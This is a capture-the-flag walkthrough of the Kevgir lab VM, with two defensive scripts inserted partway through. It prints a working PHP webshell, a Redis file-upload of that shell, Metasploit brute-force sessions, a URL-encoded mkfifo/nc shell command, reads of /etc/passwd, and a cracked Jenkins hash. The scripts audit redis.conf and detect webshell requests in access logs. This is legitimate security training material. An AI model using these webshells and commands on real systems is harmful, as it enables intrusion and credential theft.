+ Cookie 2837a59c63a65a4dec38297efe446470 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x130 0x445ac694a2180 
+ Cookie 7c97a0247c3e642ace7069114ad93f42 created without the httponly flag
+ Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie 73317aa332813d7bac99f6815015cb66 created without the httponly flag
+ Entry '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:8081/images/".
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: /test.txt: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8514 requests: 0 error(s) and 36 item(s) reported on remote host
+ End Time:           2016-03-12 19:12:57 (GMT0) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There is another phpMyAdmin directory on this port, and the credentials root:toor work here as well. I want to brute-force the administrator login page, so I put the usernames and passwords gathered so far into two text files and use Metasploit:

# cat users.txt
root
nobody
joomlauser

# cat passwords.txt 
p@ssw0rd
password
toor
1m4dm1n

And I setup metasploit with the joomla bruteforce auxiliary:

msf auxiliary(joomla_version) > use auxiliary/scanner/http/joomla_bruteforce_login
msf auxiliary(joomla_bruteforce_login) > show options

Module options (auxiliary/scanner/http/joomla_bruteforce_login):

   Name              Current Setting                                                           Required  Description
   ----              ---------------                                                           --------  -----------
   AUTH_URI          /administrator/index.php                                                  yes       The URI to authenticate against
   BLANK_PASSWORDS   false                                                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                     no        Add all users in the current database to the list
   FORM_URI          /administrator                                                            yes       The FORM URI to authenticate against
   PASSWORD                                                                                    no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt      no        File containing passwords, one per line
   PASS_VARIABLE     passwd                                                                    yes       The name of the variable for the password field
   Proxies                                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                      yes       The target address range or CIDR identifier
   RPORT             80                                                                        yes       The target port
   SSL               false                                                                     no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                     yes       Stop guessing when a credential works for a host
   THREADS           1                                                                         yes       The number of concurrent threads
   USERNAME                                                                                    no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                     no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_users.txt     no        File containing users, one per line
   USER_VARIABLE     username                                                                  yes       The name of the variable for the user field
   VERBOSE           true                                                                      yes       Whether to print output for all attempts
   VHOST                                                                                       no        HTTP server virtual host
   WORD_ERROR        mod-login-username                                                        yes       The word of message for detect that login fail

msf auxiliary(joomla_bruteforce_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(joomla_bruteforce_login) > set RPORT 8081
RPORT => 8081

msf auxiliary(joomla_bruteforce_login) > set PASS_FILE /root/Desktop/workspace/pentest/kevgir/passwords.txt
PASS_FILE => /root/Desktop/workspace/pentest/kevgir/passwords.txt
msf auxiliary(joomla_bruteforce_login) > set USER_FILE /root/Desktop/workspace/pentest/kevgir/users.txt
USER_FILE => /root/Desktop/workspace/pentest/kevgir/users.txt
msf auxiliary(joomla_bruteforce_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(joomla_bruteforce_login) > set WORD_ERROR login-error-message
WORD_ERROR => login-error-message
msf auxiliary(joomla_bruteforce_login) > exploit

Unfortunately I can’t find any user/password combination, so I move on, and I notice from the backup folder that the Joomla website is a copy of the gentleman folder. I keep a note of this for later. Since I can’t crack the password, I run a scan with OWASP’s joomscan to see if I can find any other vulnerability.

joomscan -u http://192.168.56.101:8081


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.  
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   || 
||      ||   ||  ||  |     |  ||     ''|||.   ||...|' 
'|.     ||    ||| |||     .''''|.  .     '||  ||      
 ''|...|'      |   |     .|.  .||. |'....|'  .||.     
    
 
=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4  
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan 


Target: http://192.168.56.101:8081

Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK 


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

Use of uninitialized value in pattern match (m//) at ./joomscan.pl line 1009.
~Generic version family ....... [1.5.x]

~1.5.x htaccess.txt revealed [1.5.1 - 1.5.3]
~1.5.x configuration.php-dist revealed [1.5.1 - 1.5.8]
~1.5.x en-GB.xml revealed [1.5.0 - 1.5.1]
~1.5.x en-GB.ini revealed 1.5.1
~1.5.x admin en-GB.com_config.ini revealed [1.5.0(stable) -1.5.1]
~1.5.x admin en-GB.ini revealed 1.5.1
~1.5.x adminlists.html revealed [1.5.0(stable) - 1.5.6]

* The Exact version found is 1.5.1

## Fingerprinting done.




Vulnerabilities Discovered
==========================

[...]

# 15
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability 
Versions Affected: 1.5.5 <= 
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password 
Vulnerable? Yes

[...]
There are 19 vulnerable points in 34 found entries!

So, with this scanner I can see that I could use this exploit to change the admin’s password. Since I want to keep the access I have without making noise, changing the admin’s password is not an option, so I skip this step. From the phpMyAdmin page, I access the joomla database and this is what I find for the admin user:

Name:Administrator  
Username:admin
Email: admin@joomla.org
Password: 282f4f379de5c0203e101995e95f3e80:Ce79tnJDKJvbEv6hcv7blLCoFPM3T7dg   

I look again at the website structure to find a place to store the shell, and I try the path ‘/var/www/html/gentleman/templates/rhuk_milkyway/images/blue/mw_box_br.png’. At this point I try to upload my webshell to the blue folder via Redis:

 
msf auxiliary(redis_server) > use auxiliary/scanner/redis/file_upload
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DISABLE_RDBCOMPRESSION  true             yes       Disable compression when saving if found to be enabled
   LocalFile                                no        Local file to be uploaded
   Password                foobared         no        Redis password for authentication test
   RHOSTS                                   yes       The target address range or CIDR identifier
   RPORT                   6379             yes       The target port
   RemoteFile                               no        Remote file path
   THREADS                 1                yes       The number of concurrent threads
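
As an added defensive check (not code from the post or from the Metasploit module): the upload only works because this Redis accepts CONFIG SET and SAVE without authentication. The script below audits a redis.conf for exactly those settings; both config fragments are constructed and the requirepass value is a placeholder.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
turn Redis into a file-write primitive (CONFIG SET dir/dbfilename + SAVE).

Added example, not from the original post or from the Metasploit module.
Both configs below are constructed to show the weak and the hardened form
side by side.
"""

# Constructed: everything left at its defaults, reachable from the network.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: the same instance with the relevant mitigations applied.
# The requirepass value is a placeholder, not a real secret.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

LOOPBACK = {"127.0.0.1", "::1", "-::1"}


def parse_conf(text):
    """Return (directives, renames).

    directives maps each directive name to its last value; renames maps the
    original command name (upper-case) to its new name, '' meaning disabled.
    Comment lines start with '#' in redis.conf; inline comments are not used.
    """
    directives, renames = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        name, value = name.lower(), value.strip()
        if name == "rename-command":
            parts = value.split()
            if len(parts) == 2:
                renames[parts[0].upper()] = parts[1].strip('"')
        else:
            directives[name] = value
    return directives, renames


def audit(text):
    """Return a list of findings; an empty list means the file-write path is closed."""
    directives, renames = parse_conf(text)
    findings = []

    binds = directives.get("bind", "").split()
    if not binds or not all(b in LOOPBACK for b in binds):
        findings.append("bind: reachable on " + (" ".join(binds) or "all interfaces"))

    # Older Redis has no protected-mode at all, so treat 'absent' as 'off'.
    if directives.get("protected-mode", "").lower() != "yes":
        findings.append("protected-mode: not enabled")

    # Without a password any client may run CONFIG SET dir/dbfilename and SAVE.
    if not directives.get("requirepass"):
        findings.append("requirepass: unset, CONFIG SET and SAVE are open to anyone")

    # Renaming CONFIG to '' removes the primitive even for authenticated clients.
    if renames.get("CONFIG", "CONFIG") != "":
        findings.append("rename-command: CONFIG is still reachable")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit(conf) or ['no findings']}")
```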

I generate a shell with weevely:

# weevely generate mysh3ll ~/Desktop/workspace/pentest/kevgir/shell.php
Generated backdoor with password 'mysh3ll' in '/root/Desktop/workspace/pentest/kevgir/shell.php' of 1302 byte size.

# php -S 127.0.0.1:8080
PHP 5.6.17-3 Development Server started at Sat Mar 12 19:02:42 2016
Listening on http://127.0.0.1:8080
Document root is /root/Desktop/workspace/pentest/kevgir
Press Ctrl-C to quit.

==== ON ANOTHER TERMINAL =====
# weevely http://127.0.0.1:8080/shell.php mysh3ll

[+] weevely 3.2.0

[+] Target: 127.0.0.1:8080
[+] Session:  /root/.weevely/sessions/127.0.0.1/shell_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=0(root) gid=0(root) groups=0(root)

The shell is ready, I just have to upload it somewhere.

I check in the backup folder that I’ve found to see if there’s a folder with write permissions:

root@Karen:~/Desktop/workspace/pentest/kevgir/html# find . -perm /g=w
./dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
./dvwa/hackable/uploads
./gentleman/configuration.php
./web-standards/sites/all/modules/dragdrop_gallery
./web-standards/sites/default/files
./web-standards/sites/default/files/styles
./web-standards/sites/default/default.settings.php
./web-standards/LICENSE.txt

So I go to http://192.168.56.102/dvwa and I can see that there’s the Damn Vulnerable Web Application running. I try to upload the shell to /var/www/html/dvwa/hackable/uploads/shell.php, but it doesn’t work.

I bruteforce the login page of DVWA and I find that the username and password are admin:password (nice!), so I go to the PHPInfo section and I find out that the folder is actually /var/www/html/main/dvwa (nice one guys!).

So, I try to upload the shell on /var/www/html/main/dvwa/hackable/uploads/shell.php:

msf > use auxiliary/scanner/redis/file_upload
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DISABLE_RDBCOMPRESSION  true             yes       Disable compression when saving if found to be enabled
   LocalFile                                no        Local file to be uploaded
   Password                foobared         no        Redis password for authentication test
   RHOSTS                                   yes       The target address range or CIDR identifier
   RPORT                   6379             yes       The target port
   RemoteFile                               no        Remote file path
   THREADS                 1                yes       The number of concurrent threads

msf auxiliary(file_upload) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(file_upload) > set RemoteFile /var/www/html/main/dvwa/hackable/uploads/shell.php
RemoteFile => /var/www/html/main/dvwa/hackable/uploads/shell.php
msf auxiliary(file_upload) > set LocalFile /root/Desktop/workspace/pentest/kevgir/shell.php
LocalFile => /root/Desktop/workspace/pentest/kevgir/shell.php
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting                                                        Required  Description
   ----                    ---------------                                                        --------  -----------
   DISABLE_RDBCOMPRESSION  true                                                                   yes       Disable compression when saving if found to be enabled
   LocalFile               /root/Desktop/workspace/pentest/kevgir/shell.php                       no        Local file to be uploaded
   Password                foobared                                                               no        Redis password for authentication test
   RHOSTS                  192.168.56.101                                                         yes       The target address range or CIDR identifier
   RPORT                   6379                                                                   yes       The target port
   RemoteFile              /var/www/html/main/dvwa/hackable/uploads/shell.php                     no        Remote file path
   THREADS                 1                                                                      yes       The number of concurrent threads

msf auxiliary(file_upload) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

==== ON ANOTHER TERMINAL =====
# weevely http://192.168.56.101:8081/dvwa/hackable/uploads/shell.php mysh3ll

[+] weevely 3.2.0

[+] Target: 192.168.56.101:8081
[+] Session:  /root/.weevely/sessions/192.168.56.101/shell_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[!][terminal] Backdoor communication failed: please check URL reachability and password

Unlucky, it doesn’t work. It might be due to some unexpected characters in the file. So I upload another, simpler webshell:

# cat simple-backdoor.php 
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

and this time it works:

http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=whoami
www-data

http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:111::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
tomcat7:x:106:114::/usr/share/tomcat7:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/bin/false
admin:x:1002:1002:,,,:/home/admin:/bin/bash
statd:x:108:65534::/var/lib/nfs:/bin/false
jenkins:x:109:117:Jenkins,,,:/var/lib/jenkins:/bin/bash

This way I’ve also found a list of users. I’m going to try to open a shell from this. I check that netcat is installed and I see that I can’t use the -e option to execute a command, but as I can see from the netcat man page:

There is no -c or -e option in this netcat, but you still can execute a
command after connection being established by redirecting file descrip-
tors. Be cautious here because opening a port and let anyone connected
execute arbitrary command on your site is DANGEROUS. If you really need
to do this, here is an example:

On 'server' side:

   $ rm -f /tmp/f; mkfifo /tmp/f
   $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f

On 'client' side:

   $ nc host.example.com 1234
   $ (shell prompt from host.example.com)

So I try this technique:

== ON THE BROWSER ==
http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=rm%20-f%20/tmp/f;%20mkfifo%20/tmp/f;%20cat%20/tmp/f%20%7c%20/bin/sh%20-i%202%3e%261%20%7c%20nc%20%2dlvp%201234%20%3e%20/tmp/f

== ON THE TERMINAL ==
# nc 192.168.56.101 1234
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 
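
From the other side of the wire, as an added example that is not part of the original post: every one of these `?cmd=` requests lands in Apache’s access log, and the URL-encoded mkfifo/nc pipeline is a distinctive signature. The script below decodes the query strings and flags them; the log lines are constructed, with request paths following the ones used here.

```python
"""Spot webshell command execution in an Apache access log.

Added example, not part of the original post. The log lines are constructed
in Apache 'combined' format; the request paths mirror the walkthrough.
"""
import re
from urllib.parse import unquote_plus, urlsplit

SAMPLE_LOG = """\
192.168.56.102 - - [27/Mar/2016:07:40:01 +0000] "GET /dvwa/hackable/uploads/shell5.php?cmd=whoami HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.56.102 - - [27/Mar/2016:07:40:09 +0000] "GET /dvwa/hackable/uploads/shell5.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1431 "-" "Mozilla/5.0"
192.168.56.102 - - [27/Mar/2016:07:41:30 +0000] "GET /dvwa/hackable/uploads/shell5.php?cmd=rm%20-f%20/tmp/f;%20mkfifo%20/tmp/f;%20cat%20/tmp/f%20%7c%20/bin/sh%20-i%202%3e%261%20%7c%20nc%20%2dlvp%201234%20%3e%20/tmp/f HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.50 - - [27/Mar/2016:07:42:00 +0000] "GET /dvwa/vulnerabilities/upload/?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Parameter names that simple PHP backdoors conventionally read the command from.
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}
# Shell metacharacters that chain commands or redirect file descriptors.
SHELL_META = re.compile(r'[;|&`$]|\d?>|<')
# Tooling and files that a reverse shell or a credential dump touches.
TOOLING = re.compile(
    r'\b(?:mkfifo|nc|ncat|netcat|socat|telnet|bash|sh|python|perl)\b'
    r'|/bin/(?:ba)?sh|/dev/tcp|/etc/(?:passwd|shadow)'
)
UPLOAD_DIR = re.compile(r'/uploads?/', re.IGNORECASE)


def split_query(query):
    """Split on '&' *before* percent-decoding, so a ';' or '&' inside a
    command value (e.g. '2%3e%261' -> '2>&1') is not mistaken for a separator."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name).lower(), unquote_plus(value)))
    return pairs


def analyse_request(client, ts, target):
    """Return a list of findings (dicts) for one request target."""
    parts = urlsplit(target)
    findings = []
    for name, command in split_query(parts.query):
        if name not in COMMAND_PARAMS:
            continue
        reasons = []
        # A PHP file executing under an uploads directory is suspicious on its own.
        if UPLOAD_DIR.search(parts.path) and parts.path.lower().endswith(".php"):
            reasons.append("command parameter sent to a PHP file under an uploads directory")
        if SHELL_META.search(command):
            reasons.append("shell metacharacters chain or redirect commands")
        tools = sorted(set(TOOLING.findall(command)))
        if tools:
            reasons.append("reverse-shell or credential-dump tooling: " + ", ".join(tools))
        if reasons:
            findings.append({"client": client, "ts": ts, "path": parts.path,
                             "param": name, "command": command,
                             "tools": tools, "reasons": reasons})
    return findings


def scan_log(text):
    """Parse every well-formed line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings.extend(analyse_request(m["client"], m["ts"], m["target"]))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['path']} {f['param']}={f['command']!r}")
        for reason in f["reasons"]:
            print("   -", reason)
```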

Shell obtained! I spawn a shell, have a wander around, and find all the web projects in the Apache document root:

$ pwd
/var/www/html/main
$ ls -l
total 44
drwxr-xr-x  8 www-data www-data 4096 Feb 24 23:44 dvwa
drwxr-xr-x  7 www-data www-data 4096 Feb 25 00:07 g0yg0y
-rwxr-xr-x  1 www-data www-data  236 Feb 25 00:16 index.html
-rwxr-xr-x  1 www-data www-data 4621 Feb 24 23:44 kevgir.png
-rw-r--r--  1 www-data www-data 4516 Feb 24 23:44 logo.png
drwxr-xr-x 17 www-data www-data 4096 Feb 24 23:45 mutillidae
drwxr-xr-x  3 www-data www-data 4096 Mar 26 23:42 test
drwxr-xr-x  8 www-data www-data 4096 Feb 24 23:45 xvwa
drwxr-xr-x 11 www-data www-data 4096 Feb 24 23:45 zenphoto

I go ahead and check port 9000, and I find out that there’s Jenkins running on it. I do some research using Metasploit:

msf auxiliary(joomla_bruteforce_login) > use auxiliary/scanner/http/jenkins_enum
msf auxiliary(jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(jenkins_enum) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(jenkins_enum) > set RPORT 9000
RPORT => 9000
msf auxiliary(jenkins_enum) > set TARGETURI /
TARGETURI => /
msf auxiliary(jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.101   yes       The target address range or CIDR identifier
   RPORT      9000             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Jenkins-CI application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(jenkins_enum) > run

[*] Jenkins Version - 1.647
[*] /script restricted (403)
[*] /view/All/newJob restricted (403)
[+] /asynchPeople/ does not require authentication (200)
[*] /systemInfo restricted (403)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I visit the page http://192.168.56.101:9000/asynchPeople/ and I see that the only users with access are admin and anonymous. I use another Metasploit auxiliary module to bruteforce the logins:

msf auxiliary(jenkins_enum) > use auxiliary/scanner/http/jenkins_login
msf auxiliary(jenkins_login) > show options

Module options (auxiliary/scanner/http/jenkins_login):

   Name              Current Setting          Required  Description
   ----              ---------------          --------  -----------
   BLANK_PASSWORDS   false                    no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                        yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                    no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                    no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                    no        Add all users in the current database to the list
   HTTP_METHOD       POST                     yes       The HTTP method to use for the login (Accepted: GET, POST)
   LOGIN_URL         /j_acegi_security_check  yes       The URL that handles the login process
   PASSWORD                                   no        A specific password to authenticate with
   PASS_FILE                                  no        File containing passwords, one per line
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                     yes       The target address range or CIDR identifier
   RPORT             8080                     yes       The target port
   SSL               false                    no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                    yes       Stop guessing when a credential works for a host
   THREADS           1                        yes       The number of concurrent threads
   USERNAME                                   no        A specific username to authenticate as
   USERPASS_FILE                              no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                    no        Try the username as the password for all users
   USER_FILE                                  no        File containing usernames, one per line
   VERBOSE           true                     yes       Whether to print output for all attempts
   VHOST                                      no        HTTP server virtual host

msf auxiliary(jenkins_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(jenkins_login) > set RPORT 9000
RPORT => 9000
msf auxiliary(jenkins_login) > set LOGIN_URL /login
LOGIN_URL => /login
msf auxiliary(jenkins_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(jenkins_login) > set USER_FILE Desktop/workspace/pentest/kevgir/users.txt
USER_FILE => Desktop/workspace/pentest/kevgir/users.txt
msf auxiliary(jenkins_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(jenkins_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(jenkins_login) > run

Nothing, so I go ahead and check things manually. I go to the Jenkins folder and this is what I find:

$ ls -l /var/lib/jenkins   
ls -l /var/lib/jenkins
total 68
-rw-r--r--  1 jenkins jenkins 1409 Feb 13 10:42 config.xml
-rw-r--r--  1 jenkins jenkins 1567 Mar 26 18:45 Download metadata.log
-rw-r--r--  1 jenkins jenkins  159 Mar 26 18:45 hudson.model.UpdateCenter.xml
-rw-------  1 jenkins jenkins 1680 Feb  9 02:16 identity.key.enc
-rw-r--r--  1 jenkins jenkins  138 Feb 13 10:42 jenkins.model.DownloadSettings.xml
-rw-r--r--  1 jenkins jenkins  169 Feb 13 10:42 jenkins.security.QueueItemAuthenticatorConfiguration.xml
drwxr-xr-x  3 jenkins jenkins 4096 Feb 13 04:34 jobs
-rw-r--r--  1 jenkins jenkins  907 Mar 26 18:45 nodeMonitors.xml
drwxr-xr-x  2 jenkins jenkins 4096 Feb  9 02:16 nodes
drwxr-xr-x 21 jenkins jenkins 4096 Feb  9 02:16 plugins
-rw-r--r--  1 jenkins jenkins  129 Feb 25 16:58 queue.xml.bak
-rw-r--r--  1 jenkins jenkins   64 Feb  9 02:11 secret.key
-rw-r--r--  1 jenkins jenkins    0 Feb  9 02:11 secret.key.not-so-secret
drwxr-xr-x  4 jenkins jenkins 4096 Feb 13 10:38 secrets
drwxr-xr-x  2 jenkins jenkins 4096 Feb 24 23:11 updates
drwxr-xr-x  2 jenkins jenkins 4096 Feb  9 02:16 userContent
drwxr-xr-x  3 jenkins jenkins 4096 Feb 13 10:41 users
-rw-r--r--  1 jenkins jenkins   14 Mar 26 20:36 Workspace clean-up.log

So, I go to the ‘users’ folder and I find the admin user’s folder. Inside there’s the config.xml file with information about the user and, lucky me, I find the hash of the password. It is a bcrypt (Blowfish-based) hash, so I use John the Ripper with the rockyou wordlist to crack the password:

$ cat /var/lib/jenkins/users/admin/config.xml            
<?xml version='1.0' encoding='UTF-8'?>
<user>
[...]
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$iMzGIv6.PsDI.D7r73qBhuufUnzK8C517FfsjrVkLciwRWR9L3LtK</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
[...]
</user>


== ON ANOTHER TERMINAL ==
# john jenkins_user_hashes.txt -wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (admin)
1g 0:00:00:03 DONE (2016-04-02 20:06) 0.3267g/s 19.60p/s 19.60c/s 19.60C/s playboy..hello
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So, the password of the admin user of jenkins is hello.

I check port 1322 and I find out that it’s an SSH service running on this port. I log in as admin with password admin and I start looking for a privilege escalation.

